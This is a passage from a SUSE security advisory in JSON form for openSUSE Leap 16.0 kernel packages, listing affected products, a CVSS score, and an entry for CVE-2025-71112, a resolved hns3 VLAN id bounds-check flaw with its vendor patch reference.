"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
